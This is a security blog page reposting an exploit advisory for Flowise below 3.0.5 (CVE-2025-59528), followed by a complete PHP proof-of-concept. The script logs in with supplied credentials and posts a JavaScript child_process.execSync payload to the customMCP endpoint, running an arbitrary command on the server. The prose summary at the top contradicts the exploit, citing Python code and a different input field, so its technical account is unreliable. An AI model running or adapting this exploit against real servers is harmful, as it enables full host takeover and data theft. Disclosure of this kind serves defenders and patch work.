Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Flowise 3.0.4 Code Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 25
Flowise 3.0.4, a low-code platform for building LLM applications, contained Flowise 3.0.4, a low-code platform for building LLM applications, contained a critical server-side code injection vulnerability.

This flaw allowed authenticated users to execute arbitrary Python code on the Flowise server. The injection point was the 'Additional Parameters' field within certain nodes (e.g., OpenAI Chat, HuggingFace Inference).

By crafting malicious input in this field, an attacker could achieve Remote Code Execution (RCE). This granted full control over the underlying server, enabling actions like file system access, command execution, and data exfiltration.

The vulnerability was patched in version 3.0.5 through robust input validation and sanitization, preventing the execution of untrusted code. Users of affected versions are urged to upgrade immediately to mitigate this severe security risk.

=============================================================================================================================================
| # Title : Flowise 3.0.4 php code injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://github.com/FlowiseAI/Flowise |
=============================================================================================================================================

[+] Summary :

FlowiseAI versions **below 3.0.5** contain a critical authentication?bypass RCE vulnerability in the endpoint: /api/v1/node-load-method/customMCP

After logging in with any valid account, an attacker can inject arbitrary JavaScript into the MCP handler, which is executed server?side using NodeJS?s `child_process.execSync()`.

This allows:

- Full OS command execution
- Full takeover of the host machine
- Arbitrary file modification / deletion
- Backdoor installation

[+] References : ( https://packetstorm.news/files/id/211130/ & CVE-2025-59528 )


[+] Technical Details

The exploit abuses the **customMCP load method**, which blindly evaluates supplied JavaScript:

```javascript
({x:(function(){
const cp = process.mainModule.require("child_process");
cp.execSync("COMMAND_HERE");
return 1;
})()})

When posted to: POST /api/v1/node-load-method/customMCP

Flowise executes the payload in the backend, giving full system control.


1. Save the file as: poc.php

2.Execute: php poc.php This email address is being protected from spambots. You need JavaScript enabled to view it. "Password123" http://TARGET:3000 "id"


[+] POC

<?php
/*
* Flowise < 3.0.5 - (CVE-2025-59528)
* by: Indoushka
*/

function banner() {
echo "===============================================================================\n";
echo " Flowise < 3.0.5 - Remote Code Execution (CVE-2025-59528)\n";
echo " Original Author: nltt0\n";
echo " PHP Version by: Indoushka\n";
echo "===============================================================================\n\n";
}

function login($email, $password, $url) {
$endpoint = rtrim($url, '/') . "/api/v1/auth/login";

$data = json_encode([
"email" => $email,
"password" => $password
]);

$opts = [
"http" => [
"header" =>
"Content-Type: application/json\r\n" .
"x-request-from: internal\r\n",
"method" => "POST",
"content" => $data,
"ignore_errors" => true
]
];

$context = stream_context_create($opts);
$result = file_get_contents($endpoint, false, $context);

$cookies = "";
foreach ($http_response_header as $header) {
if (stripos($header, "Set-Cookie:") !== false) {
$cookies .= trim(substr($header, 11)) . "; ";
}
}

return $cookies;
}

function exploit($email, $password, $url, $cmd) {
$cookies = login($email, $password, $url);

if (!$cookies) {
echo "[?] Login failed.\n";
return;
}

$endpoint = rtrim($url, '/') . "/api/v1/node-load-method/customMCP";

$payload = '({x:(function(){const cp=process.mainModule.require("child_process");cp.execSync("'.$cmd.'");return 1;})()})';

$postData = json_encode([
"loadMethod" => "listActions",
"inputs" => ["mcpServerConfig" => $payload]
]);

$opts = [
"http" => [
"header" =>
"Content-Type: application/json\r\n" .
"Cookie: $cookies\r\n",
"method" => "POST",
"content" => $postData,
"ignore_errors" => true
]
];

$context = stream_context_create($opts);
file_get_contents($endpoint, false, $context);

echo "[?] Command executed: $cmd\n";
}

banner();

if ($argc < 5) {
echo "Usage: php {$argv[0]} <email> <password> <url> <cmd>\n";
echo "Example:\n";
echo "php {$argv[0]} This email address is being protected from spambots. You need JavaScript enabled to view it. 'Pass@2025' http://localhost:3000 'id'\n";
exit;
}

$email = $argv[1];
$password = $argv[2];
$url = $argv[3];
$cmd = $argv[4];

exploit($email, $password, $url, $cmd);
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Social Media Share